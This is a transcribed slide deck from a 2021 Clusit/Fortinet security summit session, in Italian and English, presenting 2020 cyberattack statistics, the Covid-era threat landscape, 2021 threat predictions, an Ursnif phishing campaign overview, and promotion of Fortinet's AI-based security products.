#securitysummit #streamingedition - Virtual Private Server
←
→
Page content transcription
If your browser does not render page correctly, please read the page content below
Sessione
Digitalizzazione (forzata?), Covid e nuove tecnologie di comunicazione:
come hanno cambiato il panorama delle minacce e cosa serve fare per
affrontare la nuova normalità
Luca Bechelli, Comitato Direttivo, Clusit
Federico Saraò, System Engineer, Fortinet
16 marzo 2021 orario 15:20 -16:20 - StreamingEdition
#securitysummit #streamingedition
Luca Bechelli
COMITATO SCIENTIFICO CLUSIT
INFORMATION & CYBER SECURITY ADVISOR @P4I
2
Cosa sta succedendo?
Tipologia e distribuzione degli attaccanti 2020
2%
3%
14%
Cybercrime
Espionage / Sabotage
Hacktivism
Information warfare
81%
© Clusit - Rapporto 2021 sulla Sicurezza ICT in Italia
3
Cosa sta succedendo?
Tipologia e distribuzione delle tecniche d'attacco 2020
1%
2% Malware
5%
5% Unknown
42% Phishing / Social Engineering
10%
Vulnerabilities
Multiple Threats / APT
15% Account Cracking
DDoS
0-day
20%
© Clusit - Rapporto 2021 sulla Sicurezza ICT in Italia
4
Cosa sta succedendo?
Tipologia e distribuzione delle tecniche d'attacco 2020
1%
2%
+44%
Malware
5%
5% Unknown
42% Phishing / Social Engineering
10%
Vulnerabilities
Multiple Threats / APT
15% Account Cracking
DDoS
0-day
20%
© Clusit - Rapporto 2021 sulla Sicurezza ICT in Italia
5
Domande? e!
a z i
G r
6
Cosa sta succedendo?
Tipologia e distribuzione delle vittime 2020 Multiple targets
Gov - Mil - LE - Intelligence
8% Health
6% Research - Education
10%
5%
Online Services / Cloud
4% Others
1% SW / HW Vendor
11% 4% 1%
1% Banking / Finance
7% 1% Critical Infrastructures
Entertainment / News
1% 2% GDO / Retail
12%
Organization - ONG
Telco
20% Hospitability
14% Gov. Contractors / Consulting
Security
© Clusit - Rapporto 2021 sulla Sicurezza ICT in Italia
7
Cosa sta succedendo?
Tipologia e distribuzione delle tecniche d'attacco 2020
2%
5%
5%
1%
Malware
Unknown
+50% dei PC infetti
42% Phishing / Social Engineering
10%
Vulnerabilities
Multiple Threats / APT
15% Account Cracking
DDoS
0-day
20%
© Clusit - Rapporto 2021 sulla Sicurezza ICT in Italia
8
Cosa sta succedendo?
Tipologia Malware 2020
2% 1%
2%
4% Ransomware
4%
5% RAT
Others
6% Magecart
Crypto*
9% Backdoor
POS
67% Botnet
spyware
© Clusit - Rapporto 2021 sulla Sicurezza ICT in Italia
9
Cosa sta succedendo?
Tipologia e distribuzione delle tecniche d'attacco 2020
1%
2%
Malware
5%
5% Unknown
42% Phishing / Social Engineering
10%
Vulnerabilities
Multiple Threats / APT
15% Account Cracking
DDoS
0-day
20%
© Clusit - Rapporto 2021 sulla Sicurezza ICT in Italia
10Cosa sta succedendo?
Tipologia e distribuzione delle tecniche d'attacco 2020
1%
2%
Malware
5%
5% Unknown
42% Phishing / Social Engineering
10%
Vulnerabilities
Multiple Threats / APT
15% Account Cracking
DDoS
0-day
20%
© Clusit - Rapporto 2021 sulla Sicurezza ICT in Italia
11Cosa sta succedendo?
Tipologia e distribuzione delle tecniche d'attacco 2020
1%
2%
Malware
5%
5% Unknown
42% Phishing / Social Engineering
10%
Vulnerabilities
Multiple Threats / APT
15% Account Cracking
DDoS
0-day
20%
© Clusit - Rapporto 2021 sulla Sicurezza ICT in Italia
12I cybercriminali non vi vogliono poi così male?
Distribuzione severity per attaccante 2020
100%
80%
60%
40%
20%
0%
m e ge sm are
cr i
bo
t a it vi ar f
ber S a a ck n w
Cy / H ti o
age m a
i on for
p In
Es
Critical High Medium
© Clusit - Rapporto 2021 sulla Sicurezza ICT in Italia
13Scenario Covid-19
10 %
degli attacchi del 2020 sono riferibili al tema Covid-19
14Scenario Covid-19
70 %
degli attacchi hanno una matrice CyberCrime
15Scenario Covid-19
55 %
degli attacchi rientrano nella categoria «multiple Target»
16Scenario Covid-19
55 %
degli attacchi hanno la severità più bassa
17E gli attacchi avanzati?
Tipologia e distribuzione delle tecniche d'attacco 2020
1%
2%
Malware
5%
+46%
5% Unknown
42% Phishing / Social Engineering
10%
Vulnerabilities
Multiple Threats / APT
15% Account Cracking
DDoS
0-day
20%
© Clusit - Rapporto 2021 sulla Sicurezza ICT in Italia
18Advanced Threats Continue to Adapt
6B+
5B 5B+
4.7B
Average cost
of a data
breach is
$3.92 million
39M* 826M 1B+
604M
67M 147M 259M 3.2M
4M 4.37M* 7.47M
Cumulative Records Stolen
Annual # of Ransomware Attacks
Significant
Threat Melissa Code Red Slammer Sasser Zeus Conficker Stuxnet Cryptolocker Wannacry VPNFilter Swarmbot
Incidents
1990–1999 2000–2001 2002–2003 2004–2005 2006–2007 2008–2009 20010–2011 2012–2014 2015–2017 2018–2019 2020+
19
© Fortinet Inc. All Rights Reserved.Advanced Threats Continue to Adapt
6B+
5B 5B+
4.7B
Average cost
of a data
breach is
$3.92 million
39M* 826M 1B+
604M
67M 147M 259M 3.2M
4M 4.37M* 7.47M
Cumulative Records Stolen
Annual # of Ransomware Attacks
Significant
Threat Melissa Code Red Slammer Sasser Zeus Conficker Stuxnet Cryptolocker Wannacry VPNFilter Swarmbot
Incidents
1990–1999 2000–2001 2002–2003 2004–2005 2006–2007 2008–2009 20010–2011 2012–2014 2015–2017 2018–2019 2020+
20
© Fortinet Inc. All Rights Reserved.Cyber Threat Predictions for 2021
Intelligent Edge is a target
§ LANs, WANs, multi-cloud, data center,
remote office, IoT, mobile devices, and more
§ Each with its unique risks and vulnerabilities
§ Trojans evolve to target the edge(s)
§ Advancements in social
engineering attacks
§ 5G and swarm-based attacks
§ Evolution of ransomware
21 By FortiGuard Labs
© Fortinet Inc. All Rights Reserved.Trojans Evolve to Target the Edge(s)
§ Edge Access Trojans (EATs) sniff
edge devices data
§ Improve effectiveness of attacks
§ Intercept local network voice
requests
§ Can compromise systems or inject
commands
§ Cross-platform capabilities increase
risk
§ Open-source toolkits and
compromised devices as a service
22 By FortiGuard LabsAdvancements in Social Engineering Attacks
§ Smart devices move from target to
conduit
§ Targeting home smart systems that
tie multiple devices and systems
together
§ Discover daily routines, habits, or
personal information
§ Increase effectiveness of lures
§ Disable security systems, cameras,
or hijacking smart appliances
23 By FortiGuard Labs5G Can Enable Swarm-based Attacks
§ Weaponizing 5G and edge computing
§ Leverage thousands of hijacked devices
§ Divided into subgroups, each with
specialized skills
§ Attack targets as integrated system
§ Share intelligence in real-time
§ Require large amounts of processing
power
§ AI will need to evolve to the next
generation
24 By FortiGuard LabsNew ways to Leverage Ransomware
in Critical Infrastructure
§ Most dangerous/damaging threat
organizations face
§ Negotiating and data exfiltration
§ Convergence of technologies (OT)
create more points of failure
§ More data, more devices, more risk
§ Even to people
§ Attackers must leverage and exploit
edge and other systems
25 By FortiGuard LabsCyber Threat Predictions for 2021
Targeting Computing
Performance Innovations
§ Developments in computing performance
and innovation in connectivity
§ Advances in cryptomining
§ Spreading attacks from space
§ Quantum computing threat
26 By FortiGuard LabsAdvances in Cryptomining
§ Compromising edge devices for their
processing power
§ ML and AI capabilities require
processing power
§ Able to process massive amounts of data
§ Learn more about how and when edge devices are
used
§ Cyptomining much more effective
§ Infected PCs show CPU drain
§ Compromising secondary devices
less noticeable
§ Edge computing strategy needed today
27 By FortiGuard LabsSpreading Attacks from Space
§ Data and internet links enabled through
advanced satellite-based systems is
growing
§ Target satellite base stations
§ Spread malware through satellite-based
systems
§ Potentially target millions of connected
users at scale
§ DDoS attacks could impede vital
communications
§ OT will most likely be affected first
28 By FortiGuard LabsQuantum Computing Threat
§ Quantum computers operate at much faster
speeds than commercial computers
§ Mostly nation-states have them
§ Will render asymmetric encryption algorithms
obsolete
§ Hard-coded cryptographic systems do not allow for
protection or efficiency
§ NIST: Maintaining crypto-agility
is imperative
§ Adopt a quantum-resistant algorithm before
quantum computers become generally available
29 By FortiGuard LabsBanking trojan Ursnif/Gozi is targeting back Italy
What is Ursnif (also known as Gozi) ?
§ Gozi is one of the most widely spread banking Trojan.
§ It started its operational activity way back in 2007, but due to its
countless variations is still a serious danger to millions of users.
§ The Ursnif Trojan has been observed targeting Italy over the
past year but in the last months FortiGuardLabs detected a
phishing campaign in the wild that was spreading a fresh
variant of the Ursnif Trojan via an attached MS Word document.
30New Variant of Ursnif Targeting Italy
Fortinet Solution Coverage:
§ The Word document attached to the phishing email has been detected
as “VBA/Ursinf.3412!tr” and the downloaded file has been detected as
“W32/Ursinf.KB!tr” by the FortiGuard AntiVirus service.
§ The URL used to download Ursnif (DLL file) has been rated as
“Malicious Websites” by the FortiGuard WebFilter service.
§ The Content Disarm & Reconstruction
(CDR) feature can also neutralize this
threat by removing all malicious Macro
code.
§ The FortiGuard AntiVirus service is
supported by FortiGate, FortiMail,
FortiClient and FortiEDR. And the CDR
feature is supported by FortiGate and
FortiMail.
31Artificial Intelligence Will Be Key
Technology, people,
training, and partnerships
needed to defend
§ AI technology needs to keep up
§ AI will need to evolve to the next generation
§ Organizations can’t do it alone
§ Need to leverage outside groups/partners
32 By FortiGuard LabsAI Technology Needs to Keep Up
§ Evolution of AI is critical for future defense
against evolving attacks
§ Federated machine learning
§ Local learning nodes able to detect, analyze and
take action
§ Share information with other local nodes instead
of with centralized server
§ Playbooks can be fed to AI systems to
enable the detection of attack patterns
§ Will be able to see, anticipate, and counter attacks
§ Attacks will take milliseconds
33 By FortiGuard LabsOrganizations Can’t Do It Alone
§ Proactive defense requires effective
incident response
§ Know what to do next to stop that attack in its tracks
§ Threat-intelligence feeds, relevant
consortiums, and proactively sharing
§ Intelligent systems can be used to
§ Obfuscate network targets
§ Insert honeypots along attack paths
§ Use collected data to better train AI systems
Only by working together will we turn the tide
against cybercriminals
34 By FortiGuard LabsFortinet AI-based Solutions Milestones
2011: Fortinet has been an early adopter of leveraging Machine Learning.
2012: FortiGuard Labs develops Self Evolving Detection Systems (SEDS) based on
Artificial Neural Network (ANN) to generate and distribute malware signature.
2018: Integration AI in-line WAF in FortiWeb
2019: Integration AI in FortiSandbox, FortiInsight and FortiEDR
2020: First to offer Virtual Security AnalystTM based on Deep Neural Networks (DNN),
“SEDS v2”, with FortiAI
2011 2012 2016 2018 2019 2020
Domain/URL FortiGuard FortiGuard FortiWeb: FortiInsight: FortiSandbox: FortiEDR: FortiAI:
Research: Services: AI-based Web AI-based AI-based AI-based Virtual Security AnalystTM
Develops SEDS Deploys SEDS Application UEBA Sandboxing EDR based on DNN
to study malware antimalware protection Analysis 35AI-driven Security Operations
Global Ingestion, Analytics and Machine Learning
10B+ Events
Analyzed Every Day
Firewalls Web Emails Endpoints Sandbox Deception EDR UEBA WAF
Global Threat Intelligence Custom Machine Learning
Virtual Analyst SIEM SOAR Fabric Analytics
AI-powered Response
36Customer-deployed ML Across the Cyber Kill Chain
Reconnaissance Delivery Installation Act on Objectives
Weaponization Exploitation Command & Control
FortiWeb FortiEDR FortiInsight
FortiSanbox FortiAI
FortiMail FortiGate
FortiDeceptor 37Q&A
Vieni a trovarci al nostro virtual desk!
38FortiGuard Neural Network
Fortinet SEDS
Self-Evolving Defense System
1. Input layer–submit files for analysis
2. Hidden layers (one or more)–computation
• Malicious hidden layer scans 2.3 billion nodes analyzing for potential
malicious features
Output • Clean hidden layer scans for 3.2 billion nodes analyzing for clean features
Layer
Input 3. Output layer–results of analysis–clean or dirty
Layer Malicious Clean
Layer Layer • Output is a result of 2.3B x 3.2B individual node computations.
• Current feature set – 8.5 billion code blocks .
MLP behavior is similar to human neurons.
If input is strong enough, L J
MALICIOUS
signal is passed according to weighted value
Inputs Weights Sum Output
Input 1
Input 2 ∑ YES/NO
decision
Input 3
INPUT OUTPUT CLEAN
Single Node FEATURES
RAW SAMPLES
Func(f1*w1 + f2*w2 +...+ fn*wn)FortiAI: Virtual Security AnalystTM
Malware analyst - Identify 20+ Attack Scenarios Finding “Patient Zero” - Attack Scenario
§ What type of malware attacks am I under? § How malware was spread through the network
§ What is the intent of malware? § Sub-second verdict
§ Why is it malicious?
Downloader Redirector Dropper Ransomware Worm Phishing
Industry’s First
On-Premise
Deep Learning
Password RootKit Banking InfoStealer Exploit Fileless
Stealer Trojan
Clicker Virus Application CoinMiner DoS Wiper AI model
Search SMB
BackDoor WebShell Engine Proxy Trojan Industroyer Patient Zero Worm Spread
Poisioning
Virtual Security AnalystTM powered by Deep Neural Networks that identifies, classifies, and
investigates threats reducing detection time from minutes to sub-second verdict
99.9%FortiAI: Malware Detection Workflow
Each node represents
an “Analyst”
§ Job function: to determine if they
Files Code Verdict match a single malware feature
Blocks
§ Current features DB consists:
Binary Scripts Downloader
§ PE features (Portable
Executables) & Non-PE
Input Layer Output Layer
features
Feature Code Blocks Feature Result = Malicious
Extraction • Average 3000+ Matching (or Clean) § Via techniques such as file
• Text Parser (script), per file • Match Features Detected # e.g.
Disassembler (PE) • Count • Downloader = 26
analysis of registry values,
• De-obfuscate • Prioritize • Trojan features = 5 stack status, execution flow
• Unpack • Ransomware = 2 etc.
Neural Networks
• Features DB
§ ON-Prem Self-Learning: learn
• 6mil+ Features from customer traffic, with a
• GPU/hardware accelerated dedicated Customer Feature
DB (updated every time a new
Single Layer of Neural Network feature is identified) which is
§ Pre-trained with 20mil+ clean and malicious files (training and updates on regular basis from FortiGuard Labs) complementing the existing
FortiAI DB.
§ Billions of clean and malicious features learntFortiEDR: Real Time Endpoint Protection
Comprehensive Endpoint Security Platform
FortiEDR is the only endpoint security solution built from the ground up
PREVENT
to detect advanced threats and stop breaches and ransomware damage REAL-TIME PROTECTION
in real-time even on an already compromised device, allowing you to
respond and remediate incidents automatically to protect data, ensure
system uptime, and preserve business continuity.
DETECT &
Pre-Infection Post-Infection/ Post Execution DISCOVER DEFUSE
& PREDICT NO ALERT FATIGUE
NO DWELL TIME
PROACTIVE RISK
MANAGEMENT
Discover Prevent Detect Defuse Respond & Remediate &
& Predict Investigate Roll back
Proactive risk Pre-execution File-less and Stop Breach and Full attack visibility Automated
mitigation protection advanced threats Ransomware Dis-infection
RESPOND & REMEDIATE
CUSTOMIZED DISINFECTION
• Discover rogue • Kernel-level • Behavioral based • Block Malicious • Playbook automation • Clean up / Roll back
devices & IoT • Machine learning AV • Detect memory actions • Forensic data • Eliminate re-
• Vulnerabilities based attacks • Prevent data loss • Threat hunting image/rebuild
• Virtual patching • Threat classification • Zero Dwell time • Big data analytics • Minimize business
disruption
Automation | Cloud . Hybrid . Air-gap deployment | OS coverage
CLOUD, ON-PREMISES OR LIGHTWEIGHT
HYBRID MANAGEMENT AGENTYou can also read
